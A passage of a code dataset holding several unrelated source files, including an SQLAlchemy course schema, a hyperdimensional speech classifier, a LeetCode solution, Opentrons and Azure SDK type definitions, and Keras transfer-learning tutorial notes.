exists\n\n#create Engine object\nengine = create_engine('sqlite:///:memory:')\n#create home class\nBase = declarative_base()\n\n#object association table\ninstructor_course = Table('instructor_course', Base.metadata, Column('instructor_id', ForeignKey('instructor.id'),\\\n\t\t\t\t\t\t primary_key = True), Column('course_id', ForeignKey('course.id'), primary_key = True))\n#top class (extra addition)\nclass University(Base):\n\t__tablename__ = 'university'\n\tid = Column(Integer, Sequence('university_id_seq'), primary_key = True)\n\tname = Column(String)\n\n\t#one-to-many relationship between \"University\" and \"Course\" classes\n\tcourses = relationship('Course', order_by = 'Course.name', back_populates = 'university')\n\n\tdef __repr__(self):\n\t\treturn \"{}\".format(self.name)\n\nclass Course(Base):\n\t__tablename__ = 'course'\n\tid = Column(Integer, Sequence('course_id_seq'), primary_key = True)\n\tname = Column(String)\n\t#parent table reference\n\tuniversity_id = Column(Integer, ForeignKey('university.id'))\n\t\n\t#one-to-many relationship between \"University\" and \"Course\" classes\n\tuniversity = relationship('University', back_populates = 'courses')\n\t#one-to-many relationship between \"Course\" and \"Student\" classes\n\tstudents = relationship('Student', order_by = 'Student.lastname', back_populates = 'course')\n\t#many-to-many relationship between \"Course\" and \"Instructor\" classes\n\tinstructors = relationship('Instructor', secondary = instructor_course, back_populates = 'courses')\n\t#one-to-many relationship between \"Course\" and \"Schedule\" classes\n\tschedules = relationship('Schedule', order_by = 'Schedule.id', back_populates = 'course')\n\n\tdef __repr__(self):\n\t\treturn '{}'.format(self.name)\n\nclass Student(Base):\n\t__tablename__ = 'student'\n\tid = Column(Integer, Sequence('student_id_seq'), primary_key = 
True)\n\tfirstname = Column(String)\n\tlastname = Column(String)\n\t#parent table reference\n\tcourse_id = Column(Integer, ForeignKey('course.id'))\n\t\n\t\n\tcourse = relationship('Course', back_populates = 'students') \n\n\tdef __repr__(self):\n\t\treturn '{} {}'.format(self.lastname, self.firstname)\n\nclass Instructor(Base):\n\t__tablename__ = 'instructor'\n\tid = Column(Integer, Sequence('instructor_id_seq'), primary_key = True)\n\tfirstname = Column(String)\n\tlastname = Column(String)\n\n\t\n\tcourses = relationship('Course', secondary = instructor_course, back_populates = 'instructors')\n\t#\n\tschedules = relationship('Schedule', order_by = 'Schedule.id', back_populates = 'instructor')\n\n\tdef __repr__(self):\n\t\treturn '{} {}'.format(self.lastname, self.firstname)\n\nclass Schedule(Base):\n\t__tablename__ = 'schedule'\n\tid = Column(Integer, Sequence('schedule_id_seq'), primary_key = True)\n\tdays = ['Monday', 'Thursday', 'Wednesday', 'Tuesday', 'Friday', 'Saturday']\n\tday = Column(String)\n\tstart_time = Column(String)\n\tending_time = Column(String)\n\t#parent table reference\n\tinstructor_id = Column(Integer, ForeignKey('instructor.id'))\n\t#parent table reference\n\tcourse_id = Column(Integer, ForeignKey('course.id'))\n\n\n\tinstructor = relationship('Instructor', back_populates = 'schedules')\n\t\n\tcourse = relationship('Course', back_populates = 'schedules')\n\n\tdef __repr__(self):\n\t\treturn '{}, {}-{}'.format(self.day, self.start_time, self.ending_time)\n\n#create foreign key constraints\nBase.metadata.create_all(engine)\n#global scope\nSession = sessionmaker(bind = engine)\n#create and use a session\nsession = Session()\n#create top object (extra addition)\nuniversity = University(name = \"Tec de Monterrey\")\n#establish some initial courses\nuniversity.courses = [Course(name = 'Applied Robotic'), Course(name = \"Databases\"), Course(name = 'Multiprocessors'),\\\n\t\t\t\t\t Course(name = 'Networking')]\n#establish some initial instructors\n#instructor 1\nnew_instructor = Instructor(firstname = 'Charles', lastname = 'Hawking')\nnew_instructor.schedules.append(Schedule(day = 'Monday', start_time = '13:00', ending_time = '14:30'))\nnew_instructor.schedules[0].course = university.courses[0]\nuniversity.courses[0].instructors.append(new_instructor)\n#instructor 2\nnew_instructor = Instructor(firstname = 'Marie', lastname = 'Heissenberg')\nnew_instructor.schedules.append(Schedule(day = 'Thursday', start_time = '13:00', ending_time = '14:30'))\nnew_instructor.schedules[0].course = university.courses[0]\nuniversity.courses[0].instructors.append(new_instructor)\n#instructor 3\nnew_instructor = Instructor(firstname = 'Nikola', lastname = 'Turing')\nnew_instructor.schedules.append(Schedule(day = 'Saturday', start_time = '11:00', ending_time = '12:00'))\nnew_instructor.schedules[0].course = university.courses[0]\nuniversity.courses[0].instructors.append(new_instructor)\nnew_instructor.schedules.append(Schedule(day = 'Wednesday', start_time = '13:00', ending_time = '16:00'))\nnew_instructor.schedules[-1].course = university.courses[2]\nuniversity.courses[2].instructors.append(new_instructor)\n#instructor 4\nnew_instructor = Instructor(firstname = 'Agustin', lastname = 'Olmedo')\nnew_instructor.schedules.extend([Schedule(day = 'Monday', start_time = '10:00', ending_time = '11:30'),\\\n\t\t\t\t\t\t\t\t Schedule(day = 'Wednesday', start_time = '16:00', ending_time = '19:00'),\\\n\t\t\t\t\t\t\t\t Schedule(day = 'Thursday', start_time = '10:00', ending_time = 
'11:30')])\nnew_instructor.schedules[0].course = university.courses[1]\nnew_instructor.schedules[1].course = university.courses[1]\nnew_instructor.schedules[2].course = university.courses[1]\nuniversity.courses[1].instructors.append(new_instructor)\n#establish some initial students\nsession.add_all([\n\tStudent(firstname='Hedguhar', lastname='Dominguez'),\n\tStudent(firstname='Elle', lastname='Fanning')])\n#add university to the session\nsession.add(university)\n#write changes to database\nsession.commit()\n\n__author__ = \"Hedguhar D. G.\"\n__version__ = \"1.25\"","sub_path":"Coursera Course/4 - Manejo de bases de datos con Python/Proyecto Final/ej.py","file_name":"ej.py","file_ext":"py","file_size_in_byte":5943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"125167162","text":"# Basic implementation of VoiceHD without retraining\n\nimport matplotlib.pyplot as plt\nimport multiprocessing\nimport numpy as np\nimport sys\nimport argparse\nfrom scipy.spatial import distance as dst\nfrom sklearn.decomposition import PCA as sklearnPCA\nimport pandas as pd\nimport seaborn as sn\nimport math, random\nfrom statistics import mean\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--plot\", dest=\"plot\", action=\"store_true\")\nparser.add_argument('--m', type=int, default=10)\nparser.add_argument('--dimension', type=int, default=10000)\nparser.add_argument('--retrain', type=int, default=0)\nparser.set_defaults(debug=False, plot=False, randomize=False, average=False, dual=False)\nargs = parser.parse_args()\n\nN = 617  # number of features\nD = args.dimension  # hypervector dimensions\nM = args.m  # number of levels\n\n\nclass Record_Based:\n\n    def __init__(self):\n        # Create ID vectors\n        self.ID = []\n        for _ in range(N):\n            self.ID.append(np.random.randint(2, size=D))\n\n        # Create level vectors\n        self.L = []\n        self.L.append(np.random.randint(2, size=D))\n\n        flip = D // (M - 1)\n        rand_order = np.random.permutation(range(D))\n\n        count = 0\n        for i in range(1, M):\n            self.L.append(np.copy(self.L[i - 1]))\n            for _ in range(flip):\n                # rand_order prevents repeating flipped indices\n                # rand_order[count] steps through 0,1,2,3,... so no index is flipped twice\n                self.L[i][rand_order[count]] = not self.L[i][rand_order[count]]\n                count += 1\n\n    # The encoder outputs a voice hypervector with D binary (0,1) components.\n    def encode(self, inp):\n        S = [0] * D\n        thresh = N / 2\n\n        for i in range(N):\n            S = np.add(S, np.bitwise_xor(self.ID[i], self.L[inp[i]]))\n        return [int(x // thresh) for x in S]\n\n\ndef init():\n    # Bins used to discretize data into M levels\n    bins = np.linspace(-1, 1, num=M, endpoint=False)\n    # Load train and test data into 26 per-class lists\n    train = [[] for _ in range(26)]\n    with open('./isolet1+2+3+4.data', 'r') as f:\n        for line in f:\n            currentline = list(map(float, line.split(',')))\n            # currentline[-1] is the class label; the remaining 617 values are the features\n            train[int(currentline[-1]) - 1].append(currentline[:-1])\n\n    train = bin_data(train, bins)\n\n    test = [[] for _ in range(26)]\n    with open('./isolet5.data', 'r') as f:\n        for line in f:\n            currentline = list(map(float, line.split(',')))\n            test[int(currentline[-1]) - 1].append(currentline[:-1])\n    test = bin_data(test, bins)\n    return train, test\n\n\n# Round real valued input data to number of network states\n# np.digitize(a, b): with b = [1, 2, 3], entries of a below 1 map to 0, entries in [1, 2) map to 1, etc.\n# np.digitize(data[letter][line], bins, right=False) yields levels 1..10\n# so after the x - 1 shift the result holds levels 
between (0~9)\ndef bin_data(data, bins):\n result = [[] for _ in range(26)]\n for letter in range(26):\n for line in range(len(data[letter])):\n result[letter].append([x - 1 for x in np.digitize(data[letter][line], bins, right=False)])\n return result\n\n\ndef parallel_train(train, model, letter, lo):\n my_letter = np.array([0 for _ in range(D)])\n if lo:\n for i in range(120):\n\n my_letter += np.reshape(model.encode(train[i]), D)\n else:\n for i in range(120, len(train)):\n my_letter += np.reshape(model.encode(train[i]), D)\n letter[:] = np.add(letter, my_letter)\n\n# hamming distance\ndef parallel_test(test, model, correct_letter, letters, lo, incorrect, prediction):\n offset = 0 if lo else 30\n for i in range(30):\n if i + offset == len(test):\n prediction[i + offset] = correct_letter\n break\n test_letter = np.reshape(model.encode(test[i + offset]), D)\n min_distance = dst.hamming(letters[0], test_letter)\n min_distance_letter = 0\n for j in range(1, 26):\n distance = dst.hamming(letters[j], test_letter)\n if distance < min_distance:\n min_distance = distance\n min_distance_letter = j\n prediction[i + offset] = min_distance_letter\n if correct_letter != min_distance_letter:\n with incorrect.get_lock():\n incorrect.value += 1\n\n\ndef test_letters(letters, test, model):\n threads = 52\n incorrect = multiprocessing.Value('i', 0)\n prediction = [multiprocessing.Array('i', range(60)) for _ in range(26)]\n print('Testing')\n jobs = []\n for i in range(threads):\n letter = i // 2\n lo = True if i % 2 == 0 else False\n p = multiprocessing.Process(target=parallel_test,\n args=(test[letter], model, letter, letters, lo, incorrect,\n prediction[letter]))\n jobs.append(p)\n p.start()\n for j in jobs:\n j.join()\n return incorrect.value, prediction\n\n\ndef train_letters(train, model, retrain):\n threads = 52\n letters = [multiprocessing.Array('i', range(D)) for _ in range(26)]\n\n print('Training')\n for i in range(26):\n letters[i][:] = list(map(lambda x: 0, letters[i]))\n jobs = []\n for i in range(threads):\n letter = i // 2\n lo = True if i % 2 == 0 else False\n\n p = multiprocessing.Process(target=parallel_train,\n args=(train[letter], model, letters[letter], lo))\n jobs.append(p)\n p.start()\n for j in jobs:\n j.join()\n\n if not retrain:\n # Threshold class vectors to # number of states\n for i in range(26):\n # Two training data are missing\n instances = 238 if i == 5 else 240\n letters[i] = list(map(lambda x: round(x / instances), letters[i]))\n return letters\n\n\ndef plot_letters(letters):\n pca = sklearnPCA(n_components=2)\n transformed = pd.DataFrame(pca.fit_transform(letters))\n print(np.shape(transformed))\n print(transformed)\n letter_list = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',\n 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n letter_dict = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 5, 'g': 6, 'h': 7, 'i': 8,\n 'j': 9, 'k': 10, 'l': 11, 'm': 12, 'n': 13, 'o': 14, 'p': 15, 'q': 16, 'r': 17,\n 's': 18, 't': 19, 'u': 20, 'v': 21, 'w': 22, 'x': 23, 'y': 24, 'z': 25}\n for letter in letter_list:\n x = transformed[0][letter_dict[letter]]\n y = transformed[1][letter_dict[letter]]\n plt.scatter(x, y, marker='x', color='red')\n plt.text(x + .03, y + .03, letter, fontsize=10)\n plt.show()\n\n\ndef plot_confusion(prediction):\n plt.figure(2)\n act = np.zeros(1560, dtype=int)\n for i in range(1, 26):\n offset = i * 60\n for j in range(60):\n act[offset + j] = i\n letter_list = list('abcdefghijklmnopqrstuvwxyz')\n correction = np.arange(26)\n 
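# Appending np.arange(26) to both the actual and predicted vectors guarantees\n # that every letter appears at least once on each axis, so pd.crosstab below\n # always yields a full 26x26 table (e.g. pd.crosstab(pd.Series([0, 0, 1]),\n # pd.Series([0, 1, 1])) gives a 2x2 count table); the side effect is that\n # every diagonal cell is over-counted by exactly one.\n 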
confusion_data = {'actual': np.append(act, correction),\n 'predicted': np.append(np.reshape(prediction, 1560), correction)}\n df = pd.DataFrame(confusion_data, columns=['actual', 'predicted'])\n confusion_matrix = (pd.crosstab(df['actual'], df['predicted'],\n rownames=['Actual'], colnames=['Predicted'])) # , margins=True))\n sn.heatmap(confusion_matrix, annot=True, yticklabels=letter_list,\n xticklabels=letter_list)\n plt.show()\n\n\ndef main():\n plot = args.plot\n retrain = args.retrain\n model = Record_Based()\n\n print('Hypervector dimensions: %i' % (D))\n train, test = init()\n\n letters = train_letters(train, model, retrain)\n # for i in range(20):\n # print(letters[0][i], end=' ')\n # print()\n\n incorrect, prediction = test_letters(letters, test, model)\n correct = (1 - (incorrect / 1559)) * 100\n print('Number incorrect %i' % (incorrect))\n print('Correct: %.3f %%' % (correct))\n\n # if plot:\n # Use principal component analysis to project class vectors to two dimensions\n plot_letters(letters)\n # Plot confusion matrix of results\n plot_confusion(prediction)\n input('Press to continue.')\n\n\nif __name__ == '__main__':\n main()","sub_path":"project/Project2/Level_ID.py","file_name":"Level_ID.py","file_ext":"py","file_size_in_byte":8314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"50329653","text":"class Solution(object):\n def compare(self, a, b, order):\n len_a = len(a)\n len_b = len(b)\n i = 0\n while i < len_a and i < len_b:\n if order[a[i]] < order[b[i]]:\n return True\n elif order[a[i]] > order[b[i]]:\n return False\n else:\n i += 1\n if len_a <= len_b: # equal adjacent words are also in order\n return True\n return False\n \n \n def isAlienSorted(self, words, order):\n \"\"\"\n :type words: List[str]\n :type order: str\n :rtype: bool\n \"\"\"\n i = 0\n order_map = {}\n while i < len(order):\n order_map[order[i]] = i\n i += 1\n \n i = 1\n while i < len(words):\n if not self.compare(words[i-1], words[i], order_map):\n return False\n i += 1\n return True\n \n","sub_path":"Algo/leetcode/algorithms/String/953.py","file_name":"953.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"281236624","text":"from typing import Any, Dict, NamedTuple, Optional, Union, TYPE_CHECKING\n\nif TYPE_CHECKING:\n from opentrons_shared_data.labware.dev_types import LabwareDefinition\n from opentrons_shared_data.protocol.dev_types import (\n JsonProtocol as JsonProtocolDef\n )\n\nMetadata = Dict[str, Union[str, int]]\n\n\nclass APIVersion(NamedTuple):\n major: int\n minor: int\n\n def __str__(self):\n return f'{self.major}.{self.minor}'\n\n\nclass JsonProtocol(NamedTuple):\n text: str\n filename: Optional[str]\n contents: 'JsonProtocolDef'\n schema_version: int\n\n\nclass PythonProtocol(NamedTuple):\n text: str\n filename: Optional[str]\n contents: Any # This is the output of compile() which we can't type\n metadata: Metadata\n api_level: APIVersion\n # these 'bundled_' attrs should only be included when the protocol is a zip\n bundled_labware: Optional[Dict[str, 'LabwareDefinition']]\n bundled_data: Optional[Dict[str, bytes]]\n bundled_python: Optional[Dict[str, str]]\n # this should only be included when the protocol is not a zip\n extra_labware: Optional[Dict[str, 'LabwareDefinition']]\n\n\nProtocol = Union[JsonProtocol, PythonProtocol]\n\n\nclass BundleContents(NamedTuple):\n protocol: str\n bundled_labware: Dict[str, 'LabwareDefinition']\n bundled_data: Dict[str, bytes]\n 
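# like PythonProtocol.bundled_python above: presumably a map of file names\n # to their Python source text\n 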
bundled_python: Dict[str, str]\n\n\nPROTOCOL_MALFORMED = \"\"\"\n\nA Python protocol for the OT2 must define a function called 'run' that takes a\nsingle argument: the protocol context to call functions on. For instance, a run\nfunction might look like this:\n\ndef run(ctx):\n ctx.comment('hello, world')\n\nThis function is called by the robot when the robot executes the protocol.\nThis function is not present in the current protocol and must be added.\n\"\"\"\n\n\nclass MalformedProtocolError(Exception):\n def __init__(self, message):\n self.message = message\n super().__init__(message)\n\n def __str__(self):\n return self.message + PROTOCOL_MALFORMED\n\n def __repr__(self):\n return '<{}: {}>'.format(self.__class__.__name__, self.message)\n","sub_path":"api/src/opentrons/protocols/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"536574384","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom .execution_activity import ExecutionActivity\n\n\nclass CopyActivity(ExecutionActivity):\n \"\"\"Copy activity.\n\n All required parameters must be populated in order to send to Azure.\n\n :param additional_properties: Unmatched properties from the message are\n deserialized to this collection\n :type additional_properties: dict[str, object]\n :param name: Required. Activity name.\n :type name: str\n :param description: Activity description.\n :type description: str\n :param depends_on: Activity depends on condition.\n :type depends_on: list[~azure.mgmt.datafactory.models.ActivityDependency]\n :param user_properties: Activity user properties.\n :type user_properties: list[~azure.mgmt.datafactory.models.UserProperty]\n :param type: Required. Constant filled by server.\n :type type: str\n :param linked_service_name: Linked service reference.\n :type linked_service_name:\n ~azure.mgmt.datafactory.models.LinkedServiceReference\n :param policy: Activity policy.\n :type policy: ~azure.mgmt.datafactory.models.ActivityPolicy\n :param source: Required. Copy activity source.\n :type source: ~azure.mgmt.datafactory.models.CopySource\n :param sink: Required. Copy activity sink.\n :type sink: ~azure.mgmt.datafactory.models.CopySink\n :param translator: Copy activity translator. If not specified, tabular\n translator is used.\n :type translator: object\n :param enable_staging: Specifies whether to copy data via an interim\n staging. Default value is false. Type: boolean (or Expression with\n resultType boolean).\n :type enable_staging: object\n :param staging_settings: Specifies interim staging settings when\n EnableStaging is true.\n :type staging_settings: ~azure.mgmt.datafactory.models.StagingSettings\n :param parallel_copies: Maximum number of concurrent sessions opened on\n the source or sink to avoid overloading the data store. Type: integer (or\n Expression with resultType integer), minimum: 0.\n :type parallel_copies: object\n :param data_integration_units: Maximum number of data integration units\n that can be used to perform this data movement. 
Type: integer (or\n Expression with resultType integer), minimum: 0.\n :type data_integration_units: object\n :param enable_skip_incompatible_row: Whether to skip incompatible row.\n Default value is false. Type: boolean (or Expression with resultType\n boolean).\n :type enable_skip_incompatible_row: object\n :param redirect_incompatible_row_settings: Redirect incompatible row\n settings when EnableSkipIncompatibleRow is true.\n :type redirect_incompatible_row_settings:\n ~azure.mgmt.datafactory.models.RedirectIncompatibleRowSettings\n :param preserve_rules: Preserve Rules.\n :type preserve_rules: list[object]\n :param preserve: Preserve rules.\n :type preserve: list[object]\n :param inputs: List of inputs for the activity.\n :type inputs: list[~azure.mgmt.datafactory.models.DatasetReference]\n :param outputs: List of outputs for the activity.\n :type outputs: list[~azure.mgmt.datafactory.models.DatasetReference]\n \"\"\"\n\n _validation = {\n 'name': {'required': True},\n 'type': {'required': True},\n 'source': {'required': True},\n 'sink': {'required': True},\n }\n\n _attribute_map = {\n 'additional_properties': {'key': '', 'type': '{object}'},\n 'name': {'key': 'name', 'type': 'str'},\n 'description': {'key': 'description', 'type': 'str'},\n 'depends_on': {'key': 'dependsOn', 'type': '[ActivityDependency]'},\n 'user_properties': {'key': 'userProperties', 'type': '[UserProperty]'},\n 'type': {'key': 'type', 'type': 'str'},\n 'linked_service_name': {'key': 'linkedServiceName', 'type': 'LinkedServiceReference'},\n 'policy': {'key': 'policy', 'type': 'ActivityPolicy'},\n 'source': {'key': 'typeProperties.source', 'type': 'CopySource'},\n 'sink': {'key': 'typeProperties.sink', 'type': 'CopySink'},\n 'translator': {'key': 'typeProperties.translator', 'type': 'object'},\n 'enable_staging': {'key': 'typeProperties.enableStaging', 'type': 'object'},\n 'staging_settings': {'key': 'typeProperties.stagingSettings', 'type': 'StagingSettings'},\n 'parallel_copies': {'key': 'typeProperties.parallelCopies', 'type': 'object'},\n 'data_integration_units': {'key': 'typeProperties.dataIntegrationUnits', 'type': 'object'},\n 'enable_skip_incompatible_row': {'key': 'typeProperties.enableSkipIncompatibleRow', 'type': 'object'},\n 'redirect_incompatible_row_settings': {'key': 'typeProperties.redirectIncompatibleRowSettings', 'type': 'RedirectIncompatibleRowSettings'},\n 'preserve_rules': {'key': 'typeProperties.preserveRules', 'type': '[object]'},\n 'preserve': {'key': 'typeProperties.preserve', 'type': '[object]'},\n 'inputs': {'key': 'inputs', 'type': '[DatasetReference]'},\n 'outputs': {'key': 'outputs', 'type': '[DatasetReference]'},\n }\n\n def __init__(self, **kwargs):\n super(CopyActivity, self).__init__(**kwargs)\n self.source = kwargs.get('source', None)\n self.sink = kwargs.get('sink', None)\n self.translator = kwargs.get('translator', None)\n self.enable_staging = kwargs.get('enable_staging', None)\n self.staging_settings = kwargs.get('staging_settings', None)\n self.parallel_copies = kwargs.get('parallel_copies', None)\n self.data_integration_units = kwargs.get('data_integration_units', None)\n self.enable_skip_incompatible_row = kwargs.get('enable_skip_incompatible_row', None)\n self.redirect_incompatible_row_settings = kwargs.get('redirect_incompatible_row_settings', None)\n self.preserve_rules = kwargs.get('preserve_rules', None)\n self.preserve = kwargs.get('preserve', None)\n self.inputs = kwargs.get('inputs', None)\n self.outputs = kwargs.get('outputs', None)\n self.type = 
'Copy'\n","sub_path":"sdk/datafactory/azure-mgmt-datafactory/azure/mgmt/datafactory/models/copy_activity.py","file_name":"copy_activity.py","file_ext":"py","file_size_in_byte":6463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"221053269","text":"#Keras - front end interface to TensorFlow\n\n############THE VERY BASICS#####################################################\n# The keras.models.Sequential class is a wrapper for the neural network model. \n# It provides common functions like fit(), evaluate(), and compile().\n\nfrom keras.models import Sequential\n\n# Create the Sequential model\nmodel = Sequential()\n\n#1st Layer - Add a flatten layer\nmodel.add(Flatten(input_shape=(32, 32, 3)))\n\n#2nd Layer - Add a fully connected layer (the '100' is the output shape)\nmodel.add(Dense(100))\n\n#3rd Layer - Add a ReLU activation layer\nmodel.add(Activation('relu'))\n\n#4th Layer - Add a fully connected layer - output of last layer should be equal to the number of\n#\"classes\" for a classification problem ... for example MNST (0-9 digits - set to 10), traffic sign classifer was 43 classes\n#This example shows '60'\nmodel.add(Dense(60))\n\n#5th Layer - Add a ReLU activation layer\nmodel.add(Activation('relu'))\n\n# Keras will automatically infer the shape of all layers after the first layer. \n# This means you only have to set the input dimensions for the first layer.\n# The first layer from above, model.add(Flatten(input_shape=(32, 32, 3))), sets the input dimension to (32, 32, 3) \n# and output dimension to (3072=32 x 32 x 3). The second layer takes in the output of the first layer and sets the \n# output dimensions to (100). This chain of passing output to the next layer continues until the last layer, \n#which is the output of the model.\n\n\n#####################################################################################\nimport pickle\nimport numpy as np\nimport tensorflow as tf\n\n# Load pickled data\nwith open('small_train_traffic.p', mode='rb') as f:\n data = pickle.load(f)\n\n# split data\nX_train, y_train = data['features'], data['labels']\n\n# Setup Keras\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Activation, Flatten, Dropout\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.pooling import MaxPooling2D\n\n# ONE EXAMPLE OF A FULLY CONNECTED NETWORK with the following characteristics:\n# Set the first layer to a Flatten() layer with the input_shape set to (32, 32, 3).\n# Set the second layer to a Dense() layer with an output width of 128.\n# Use a ReLU activation function after the second layer.\n# Set the output layer width to 5, because for this data set there are only 5 classes.\n# Use a softmax activation function after the output layer.\n# Train the model for 3 epochs. You should be able to get over 50% training accuracy.\nmy_model = Sequential()\nmy_model.add(Flatten(input_shape=(32, 32, 3)))\nmy_model.add(Dense((128), activation = 'relu'))\n#my_model.add(Activation('relu'))\nmy_model.add(Dense((5), activation = 'softmax'))\n#my_model.add(Activation('softmax'))\n\n#ONE EXAMPLE OF CONVOLUTIONAL\n# Building from the previous network...\n# Add a convolutional layer with 32 filters, a 3x3 kernel, and valid padding before the flatten layer.\n#Add a ReLU activation after the convolutional layer.\n#Add a 2x2 max pooling layer immediately following your convolutional layer.\n#Add a dropout layer after the pooling layer. Set the dropout rate to 50%. 
(Note in Keras this is the prob to drop)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), input_shape=(32, 32, 3)))\nmodel.add(MaxPooling2D((2, 2)))\nmodel.add(Dropout(0.5))\nmodel.add(Activation('relu'))\nmodel.add(Flatten())\nmodel.add(Dense(128))\nmodel.add(Activation('relu'))\nmodel.add(Dense(5))\nmodel.add(Activation('softmax'))\n\n\n# preprocess data\nX_normalized = np.array(X_train / 255.0 - 0.5 )\n\nfrom sklearn.preprocessing import LabelBinarizer\nlabel_binarizer = LabelBinarizer()\ny_one_hot = label_binarizer.fit_transform(y_train)\n\nmy_model.compile('adam', 'categorical_crossentropy', ['accuracy'])\n# Can change the number of epochs here\nhistory = my_model.fit(X_normalized, y_one_hot, epochs=3, validation_split=0.2)\n\n\n\n# evaluate model against the test data\nwith open('small_test_traffic.p', 'rb') as f:\n data_test = pickle.load(f)\n\nX_test = data_test['features']\ny_test = data_test['labels']\n\n# preprocess data\nX_normalized_test = np.array(X_test / 255.0 - 0.5 )\ny_one_hot_test = label_binarizer.fit_transform(y_test)\n\nprint(\"Testing\")\n\nmetrics = model.evaluate(X_normalized_test, y_one_hot_test)\nfor metric_i in range(len(model.metrics_names)):\n metric_name = model.metrics_names[metric_i]\n metric_value = metrics[metric_i]\n print('{}: {}'.format(metric_name, metric_value)) \n\n\n\n###########################From Lesson 18 Transfer Learning, Section 9. VGG##########################\n# Load our images first, and we'll check what we have\nfrom glob import glob\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\n\nimage_paths = glob('images/*.jpg')\n\n# Print out the image paths\nprint(image_paths)\n\n# View an example of an image\nexample = mpimg.imread(image_paths[0])\nplt.imshow(example)\nplt.show()\n\n# Here, we'll load an image and pre-process it\nfrom keras.preprocessing import image\nfrom keras.applications.vgg16 import preprocess_input\nimport numpy as np\n\ni = 1 # Can change this to your desired image to test\nimg_path = image_paths[i]\nimg = image.load_img(img_path, target_size=(224, 224))\nx = image.img_to_array(img)\nx = np.expand_dims(x, axis=0)\nx = preprocess_input(x)\n\n# Note - this will likely need to download a new version of VGG16\nfrom keras.applications.vgg16 import VGG16, decode_predictions\n\n# Load the pre-trained model\nmodel = VGG16(weights='imagenet')\n\n# Perform inference on our pre-processed image\npredictions = model.predict(x)\n\n# Check the top 3 predictions of the model\nprint('Predicted:', decode_predictions(predictions, top=3)[0])\n\n\n###########################From Lesson 18 Transfer Learning, Section 14. Lab on Transfer Learning##########################\n\n# Welcome to the lab on Transfer Learning! Here, you'll get a chance to try out training a network with ImageNet \n# pre-trained weights as a base, but with additional network layers of your own added on. You'll also get to see \n# the difference between using frozen weights and training on all layers.\n\n\n# Set a couple flags for training - you can ignore these for now\nfreeze_flag = True # `True` to freeze layers, `False` for full training\nweights_flag = 'imagenet' # 'imagenet' or None\npreprocess_flag = True # Should be true for ImageNet pre-trained typically\n\n# Loads in InceptionV3\nfrom keras.applications.inception_v3 import InceptionV3\n\n# We can use smaller than the default 299x299x3 input for InceptionV3\n# which will speed up training. 
Keras v2.0.9 supports down to 139x139x3\ninput_size = 139\n\n# Using Inception with ImageNet pre-trained weights\ninception = InceptionV3(weights=weights_flag, include_top=False,\n input_shape=(input_size,input_size,3))\n\nif freeze_flag == True:\n ## TODO: Iterate through the layers of the Inception model\n ## loaded above and set all of them to have trainable = False\n for layer in inception.layers:\n layer.trainable = False\n#print(\"Model Layers\", inception.layers)\n\n## TODO: Use the model summary function to see all layers in the\n## loaded Inception model\ninception.summary()\n\nfrom keras.layers import Input, Lambda\nimport tensorflow as tf\n\n# Makes the input placeholder layer 32x32x3 for CIFAR-10\ncifar_input = Input(shape=(32,32,3))\n\n# Re-sizes the input with Keras' Lambda layer & attaches it to cifar_input\nresized_input = Lambda(lambda image: tf.image.resize_images( \n image, (input_size, input_size)))(cifar_input)\n\n# Feeds the re-sized input into Inception model\n# You will need to update the model name if you changed it earlier!\ninp = inception(resized_input)\n\n# Imports fully-connected \"Dense\" layers & Global Average Pooling\nfrom keras.layers import Dense, GlobalAveragePooling2D\n\n## TODO: Setting `include_top` to False earlier also removed the\n## GlobalAveragePooling2D layer, but we still want it.\n## Add it here, and make sure to connect it to the end of Inception\nx1 = GlobalAveragePooling2D()(inp)\n\n## TODO: Create two new fully-connected layers using the Model API\n## format discussed above. The first layer should use `out`\n## as its input, along with ReLU activation. You can choose\n## how many nodes it has, although 512 or less is a good idea.\n## The second layer should take this first layer as input, and\n## be named \"predictions\", with Softmax activation and \n## 10 nodes, as we'll be using the CIFAR10 dataset.\nx2 = Dense(512, activation = 'relu')(x1)\npredictions = Dense(10, activation = 'softmax')(x2)\n\n# Imports the Model API\nfrom keras.models import Model\n\n# Creates the model, assuming your final layer is named \"predictions\"\nmodel = Model(inputs=cifar_input, outputs=predictions)\n\n# Compile the model\nmodel.compile(optimizer='Adam', loss='categorical_crossentropy', metrics=['accuracy'])\n\n# Check the summary of this new model to confirm the architecture\nmodel.summary()\n\n#GPU TIME!!\nfrom sklearn.utils import shuffle\nfrom sklearn.preprocessing import LabelBinarizer\nfrom keras.datasets import cifar10\n\n(X_train, y_train), (X_val, y_val) = cifar10.load_data()\n\n# One-hot encode the labels\nlabel_binarizer = LabelBinarizer()\ny_one_hot_train = label_binarizer.fit_transform(y_train)\ny_one_hot_val = label_binarizer.fit_transform(y_val)\n\n# Shuffle the training & test data\nX_train, y_one_hot_train = shuffle(X_train, y_one_hot_train)\nX_val, y_one_hot_val = shuffle(X_val, y_one_hot_val)\n\n# We are only going to use the first 10,000 images for speed reasons\n# And only the first 2,000 images from the test set\nX_train = X_train[:10000]\ny_one_hot_train = y_one_hot_train[:10000]\nX_val = X_val[:2000]\ny_one_hot_val = y_one_hot_val[:2000]\n\n\n# Use a generator to pre-process our images for 